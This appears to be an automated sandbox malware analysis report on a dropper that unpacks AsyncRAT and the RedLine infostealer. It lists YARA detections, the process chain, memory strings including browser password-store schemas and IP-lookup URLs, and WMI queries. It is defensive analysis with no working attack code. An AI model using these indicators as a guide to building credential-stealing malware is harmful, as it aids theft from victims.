Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: r.exe	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE
Source: r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: r.exe	String found in binary or memory: https://api.ipify.orgcookies//setti
Source: r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.3.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

PE file contains section with special chars

Source: 3.exe.1.dr	Static PE information: section name:
Source: r.exe.6.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\3.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DBC2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7E1DBC2F0

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DDB190	0_2_00007FF7E1DDB190
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DCA4AC	0_2_00007FF7E1DCA4AC
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD3484	0_2_00007FF7E1DD3484
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DE0754	0_2_00007FF7E1DE0754
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DBF930	0_2_00007FF7E1DBF930
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DC4928	0_2_00007FF7E1DC4928
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DDCE88	0_2_00007FF7E1DDCE88
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DB5E24	0_2_00007FF7E1DB5E24
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD1F20	0_2_00007FF7E1DD1F20
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DBA310	0_2_00007FF7E1DBA310
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DBC2F0	0_2_00007FF7E1DBC2F0
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DB7288	0_2_00007FF7E1DB7288
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DC126C	0_2_00007FF7E1DC126C
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD21D0	0_2_00007FF7E1DD21D0
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DCF180	0_2_00007FF7E1DCF180
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD53F0	0_2_00007FF7E1DD53F0
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DB76C0	0_2_00007FF7E1DB76C0
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DF2550	0_2_00007FF7E1DF2550
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DCB534	0_2_00007FF7E1DCB534
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DB4840	0_2_00007FF7E1DB4840
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DEC838	0_2_00007FF7E1DEC838
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DF5AF8	0_2_00007FF7E1DF5AF8
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DB1AA4	0_2_00007FF7E1DB1AA4
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD2AB0	0_2_00007FF7E1DD2AB0
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DEFA94	0_2_00007FF7E1DEFA94
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DC1A48	0_2_00007FF7E1DC1A48
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DE89A0	0_2_00007FF7E1DE89A0
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD3964	0_2_00007FF7E1DD3964
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DCC96C	0_2_00007FF7E1DCC96C
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DE8C1C	0_2_00007FF7E1DE8C1C
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD4B98	0_2_00007FF7E1DD4B98
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DCBB90	0_2_00007FF7E1DCBB90
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DC5B60	0_2_00007FF7E1DC5B60
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD8DF4	0_2_00007FF7E1DD8DF4
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DE0754	0_2_00007FF7E1DE0754
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DD2D58	0_2_00007FF7E1DD2D58
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DF2080	0_2_00007FF7E1DF2080
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DCAF18	0_2_00007FF7E1DCAF18
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B692C6	1_2_00B692C6
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B77DDC	1_2_00B77DDC
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B75011	1_2_00B75011
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B862A8	1_2_00B862A8
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B75282	1_2_00B75282
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B702F7	1_2_00B702F7
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B78253	1_2_00B78253
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B713FD	1_2_00B713FD
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B864D7	1_2_00B864D7
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B7742E	1_2_00B7742E
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B755B0	1_2_00B755B0
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B8E600	1_2_00B8E600
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B707A7	1_2_00B707A7
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B788AF	1_2_00B788AF
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B6D833	1_2_00B6D833
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B6395A	1_2_00B6395A
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B8EAAE	1_2_00B8EAAE
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B64A8E	1_2_00B64A8E
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B92BB4	1_2_00B92BB4
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B6FCCC	1_2_00B6FCCC
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B62EB6	1_2_00B62EB6
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00DE6348	2_2_00DE6348
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00DE84B8	2_2_00DE84B8
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00DE5670	2_2_00DE5670
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00DEAC10	2_2_00DEAC10
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00DE5328	2_2_00DE5328
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00DE0BA0	2_2_00DE0BA0
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00ED92C6	6_2_00ED92C6
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE7DDC	6_2_00EE7DDC
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE5011	6_2_00EE5011
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE02F7	6_2_00EE02F7
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EF62A8	6_2_00EF62A8
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE5282	6_2_00EE5282
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE8253	6_2_00EE8253
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE13FD	6_2_00EE13FD
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EF64D7	6_2_00EF64D7
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE742E	6_2_00EE742E
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE55B0	6_2_00EE55B0
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EFE600	6_2_00EFE600
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE07A7	6_2_00EE07A7
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EE88AF	6_2_00EE88AF
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EDD833	6_2_00EDD833
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00ED395A	6_2_00ED395A
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EFEAAE	6_2_00EFEAAE
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00ED4A8E	6_2_00ED4A8E
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00F02BB4	6_2_00F02BB4
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EDFCCC	6_2_00EDFCCC
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00ED2EB6	6_2_00ED2EB6
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_01B5E7B0	7_2_01B5E7B0
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_01B5DC90	7_2_01B5DC90
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_06FD4468	7_2_06FD4468
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_06FD9628	7_2_06FD9628
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_06FD1210	7_2_06FD1210
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_06FD3320	7_2_06FD3320
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_06FDDD00	7_2_06FDDD00
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_06FDD108	7_2_06FDD108

Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: String function: 00EEFEFC appears 42 times
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: String function: 00EF07A0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: String function: 00EEFFD0 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: String function: 00B7FEFC appears 42 times
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: String function: 00B807A0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: String function: 00B7FFD0 appears 56 times

Source: 2.2.3.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: 3.exe.1.dr	Static PE information: Section: ZLIB complexity 1.0007113755416155
Source: r.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9971846443824112

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/48@1/1

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DBB6D8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF7E1DBB6D8

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DD8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF7E1DD8624

Source: C:\Users\user\AppData\Local\Temp\r.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\r.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\3.exe	Mutant created: \Sessions\1\BaseNamedObjects\DPO5yNZvebP2C4hf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5080953

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4.exe	Command line argument: sfxname	1_2_00B7F05C
Source: C:\Users\user\AppData\Local\Temp\4.exe	Command line argument: sfxstime	1_2_00B7F05C
Source: C:\Users\user\AppData\Local\Temp\4.exe	Command line argument: STARTDLG	1_2_00B7F05C
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Command line argument: sfxname	6_2_00EEF05C
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Command line argument: sfxstime	6_2_00EEF05C
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Command line argument: STARTDLG	6_2_00EEF05C

Source: KR6CT3hIxT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: r.exe, 00000007.00000002.2165535966.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, tmp2BB4.tmp.7.dr, tmp2BA3.tmp.7.dr, tmp2BD6.tmp.7.dr, tmpF502.tmp.7.dr, tmp2BC6.tmp.7.dr, tmp2BC5.tmp.7.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: KR6CT3hIxT.exe	ReversingLabs: Detection: 36%
Source: KR6CT3hIxT.exe	Virustotal: Detection: 55%

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

File read: C:\Users\user\Desktop\KR6CT3hIxT.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KR6CT3hIxT.exe "C:\Users\user\Desktop\KR6CT3hIxT.exe"
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Process created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe"
Source: C:\Users\user\AppData\Local\Temp\4.exe	Process created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe"
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Users\user\AppData\Local\Temp\rdegje.exe "C:\Users\user\AppData\Local\Temp\rdegje.exe"
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Process created: C:\Users\user\AppData\Local\Temp\r.exe "C:\Users\user\AppData\Local\Temp\r.exe"
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Process created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Process created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Users\user\AppData\Local\Temp\rdegje.exe "C:\Users\user\AppData\Local\Temp\rdegje.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Process created: C:\Users\user\AppData\Local\Temp\r.exe "C:\Users\user\AppData\Local\Temp\r.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: coreuicomponents.dll	Jump to behavior
